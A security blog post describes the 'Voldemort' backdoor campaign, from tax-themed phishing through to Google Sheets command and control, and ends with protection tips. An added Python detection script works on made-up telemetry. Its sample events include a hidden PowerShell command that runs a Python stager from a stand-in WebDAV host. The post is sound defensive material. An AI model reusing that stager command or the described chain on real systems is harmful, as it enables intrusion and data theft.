Here’s what you need to know about Voldemort Malware, how it operates, and steps you can take to protect yourself.
Another malware campaign has emerged, presenting significant risks to organisations across various sectors worldwide. Researchers have named this sophisticated malware “Voldemort.” It relies on an unexpected tool, Google Sheets, to control infected machines, which makes it both unusual and hazardous.
What Is Voldemort Malware?
Voldemort is a custom backdoor malware recently discovered by cybersecurity experts.
Unlike traditional malware, Voldemort utilizes Google Sheets as its command-and-control (C2) mechanism, allowing it to communicate with its operators and receive instructions. This malware has targeted over 70 organizations across various industries, including insurance, finance, healthcare, technology, and government sectors. The campaign behind Voldemort is suspected to be part of a larger cyber espionage effort, although the exact perpetrators remain unidentified.
The Voldemort malware is particularly concerning due to its unconventional approach to spreading and executing malicious code. It impersonates tax authorities from various countries—including the U.S., U.K., and Japan—to trick recipients into clicking on links that appear legitimate but redirect them to a landing page designed to exploit their systems.
How Does Voldemort Malware Work?
The attack begins with phishing emails claiming to be from tax authorities, warning recipients about changes to their tax filings. These emails include links that, when clicked, lead to a webpage that checks whether the victim is using a Windows operating system. If the user is on Windows, the webpage uses a Windows shortcut file disguised as a PDF to initiate the attack.
Once the user is tricked into opening this file, a sequence of commands is triggered. The Windows shortcut file invokes PowerShell, which runs a Python script from a remote server. This script gathers system information and sends it back to the attackers. To avoid detection, the script does not download any files directly onto the victim’s computer. Instead, it loads dependencies from a WebDAV share, a technique that further obscures the attack.
The malware then displays a decoy PDF to the user to maintain the illusion of legitimacy while simultaneously downloading a password-protected ZIP file. This ZIP file contains a legitimate executable vulnerable to DLL side-loading and a malicious DLL, which is the Voldemort malware itself. The malware then exploits Google Sheets to exfiltrate data and execute commands.
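The chain described above leaves several distinctive traces on an endpoint: a shortcut whose bytes say “.lnk” while its name says “.pdf”, PowerShell or Python running straight off a WebDAV share, a DLL loaded from the same user-writable folder as the executable that loads it, and a non-browser process talking to the Google Sheets API. The script below is an added illustration, not code from the original post or from the researchers who analysed Voldemort. The event schema, the browser allowlist, the user-writable directory pattern, and every host name, file name and path in the sample events are constructed assumptions; nothing here is a real indicator from the campaign.

```python
"""
Added example: a small detection pass over constructed endpoint telemetry for the
Voldemort-style chain (LNK-as-PDF lure -> PowerShell -> Python from a WebDAV share
-> DLL side-loading from a user-writable folder -> Google Sheets as C2).
All events, host names, paths and file names are constructed placeholders.
"""
import re

# Windows shortcut files begin with HeaderSize 0x0000004C followed by the LinkCLSID
# {00021401-0000-0000-C000-000000000046} stored little-endian.
LNK_MAGIC = bytes.fromhex("4C000000" "01140200" "00000000" "C0000000" "00000046")

# Document extensions a lure might borrow; Explorer hides the trailing ".lnk".
DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?)(\.lnk)?$", re.IGNORECASE)

# How Windows spells WebDAV paths: \\host@SSL\DavWWWRoot\..., \\host@443\..., or DavWWWRoot anywhere.
WEBDAV = re.compile(r"\\\\[^\\\s]+@(?:ssl|\d+)\\|davwwwroot", re.IGNORECASE)

# Assumed allowlists/patterns; tune these for a real environment.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
USER_WRITABLE = re.compile(r"\\(users|programdata|temp)\\", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_lnk_masquerading_as_document(name: str, head: bytes) -> bool:
    """True when the file's first bytes say 'shortcut' but its name says 'document'."""
    return head.startswith(LNK_MAGIC) and DOC_EXT.search(name) is not None


def check_process(ev: dict) -> list[str]:
    """Script host referencing a WebDAV share, or any binary executed directly from one."""
    findings = []
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    if image in SCRIPT_HOSTS and WEBDAV.search(cmd):
        findings.append(f"{image} (parent {parent}) references a WebDAV share: {cmd[:70]}")
    if WEBDAV.search(ev["image"]):
        findings.append(f"{image} executed directly from a WebDAV share (parent {parent})")
    return findings


def check_imageload(ev: dict) -> list[str]:
    """Executable and DLL unpacked side by side in a user-writable folder: side-loading shape."""
    exe_dir = ev["image"].rsplit("\\", 1)[0].lower()
    dll_dir = ev["loaded"].rsplit("\\", 1)[0].lower()
    if ev["loaded"].lower().endswith(".dll") and exe_dir == dll_dir and USER_WRITABLE.search(dll_dir):
        return [f"{basename(ev['image'])} loaded {basename(ev['loaded'])} from {dll_dir} (possible DLL side-loading)"]
    return []


def check_network(ev: dict) -> list[str]:
    """Only browsers are expected to talk to the Sheets API on a typical workstation (assumption)."""
    if ev["dest_host"].lower() == "sheets.googleapis.com" and basename(ev["image"]) not in BROWSERS:
        return [f"non-browser process {basename(ev['image'])} connected to sheets.googleapis.com (possible C2)"]
    return []


def analyse(events: list[dict]) -> list[str]:
    dispatch = {"process": check_process, "imageload": check_imageload, "network": check_network}
    findings: list[str] = []
    for ev in events:
        findings.extend(dispatch[ev["type"]](ev))
    return findings


# Constructed sample telemetry: three benign events interleaved with the malicious chain.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Service WebClient"},  # benign admin use
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden \\files.example.invalid@SSL\DavWWWRoot\py\python.exe "
                r"\\files.example.invalid@SSL\DavWWWRoot\stage.py"},  # shortcut-launched stager
    {"type": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"\\files.example.invalid@SSL\DavWWWRoot\py\python.exe",
     "cmdline": r"python.exe \\files.example.invalid@SSL\DavWWWRoot\stage.py"},
    {"type": "imageload", "image": r"C:\Program Files\VendorApp\vendorapp.exe",
     "loaded": r"C:\Windows\System32\kernel32.dll"},  # benign system DLL
    {"type": "imageload", "image": r"C:\Users\alice\AppData\Local\Temp\unzipped\vendorapp.exe",
     "loaded": r"C:\Users\alice\AppData\Local\Temp\unzipped\helper.dll"},  # unpacked exe + DLL
    {"type": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "sheets.googleapis.com"},  # benign browser traffic
    {"type": "network", "image": r"C:\Users\alice\AppData\Local\Temp\unzipped\vendorapp.exe",
     "dest_host": "sheets.googleapis.com"},  # side-loaded host talking to the C2 channel
]

if __name__ == "__main__":
    print(is_lnk_masquerading_as_document("Tax_Notice.pdf.lnk", LNK_MAGIC + b"\x00" * 4))
    for line in analyse(SAMPLE_EVENTS):
        print("ALERT:", line)
```

The four alerts the sample produces map one-to-one onto the stages in the text; in practice each rule would be fed from process-creation, image-load and network-connection telemetry (Sysmon event IDs 1, 7 and 3, for instance), and the Sheets rule in particular needs an allowlist of legitimate Google clients before it is quiet enough to page on.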
The Significance of the Attack
The combination of advanced and basic techniques used by the Voldemort malware is particularly alarming. It employs sophisticated methods, such as abusing Google Sheets for C2 communication, while also relying on simpler tactics like phishing and using legitimate software components to evade detection. This blend of old and new tactics complicates cybersecurity experts’ efforts to fully understand the attackers’ intentions or anticipate their next move.
The campaign appears to be extensive, targeting a wide range of industries and potentially casting a broad net to gather intelligence before zeroing in on specific high-value targets. With over 20,000 phishing emails sent as part of this campaign, the scale of the operation is significant, even though the exact number of successful infections remains unclear.
How to Protect Yourself from Voldemort Malware
While waiting for this malware to be eradicated, it’s essential to limit access to external file-sharing services as much as possible. However, the most effective defense is to strengthen the human factor, which remains a critical weak point exploited by criminals to penetrate organizations’ systems.
🐍 Be Cautious with Email Links: Always verify the authenticity of emails, especially those that claim to be from government agencies or other authoritative bodies.
Avoid clicking on links from unknown or suspicious sources.
🐍 Update and Patch Software: Ensure all software, particularly security applications, is current.
This includes applying patches for known vulnerabilities that malware could exploit.
🐍 Educate and Train Employees: Conduct regular cybersecurity training for employees to recognize phishing attempts and other common attack vectors.
🐍 Implement Advanced Security Measures: Use powerful threat detection and response tools that can identify and mitigate sophisticated attacks like those involving Voldemort.
Network monitoring, endpoint protection, and intrusion detection systems are essential.
🐍 Back Up Critical Data: Regularly back up important data to reduce the impact of a potential malware attack.
Cybercriminals often prepare well-packaged bait designed to deceive victims, typically employees or operators within a company or organization, into clicking on malicious links.
Not falling into this trap is, therefore, the most effective defense. Achieving this outcome requires quality training, including continuous practical exercises and staying updated with the latest security news.